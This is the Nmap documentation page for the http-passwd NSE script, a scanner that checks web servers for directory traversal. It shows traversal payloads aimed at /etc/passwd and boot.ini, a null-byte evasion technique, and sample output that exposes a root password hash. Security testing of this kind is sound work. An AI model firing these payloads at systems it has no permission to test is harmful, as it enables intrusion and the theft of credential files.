Home page logo
/
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News

Sponsors


File http-passwd

Script types: portrule
Categories: intrusive, vuln
Download: http://nmap.org/svn/scripts/http-passwd.nse

User Summary

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

The script uses several technique:

  • Generic directory traversal by requesting paths like ../../../../etc/passwd.
  • Known specific traversals of several web servers.
  • Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument http-passwd.root.

Script Arguments

http-passwd.root

Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

unittest.run

See the documentation for the unittest library.

Example Usage

nmap --script http-passwd --script-args http-passwd.root=/test/ <target>

Script Output

80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect


80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

Requires


Author: Kris Katterjohn, Ange Gutek

License: Same as Nmap--See http://nmap.org/book/man-legal.html

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]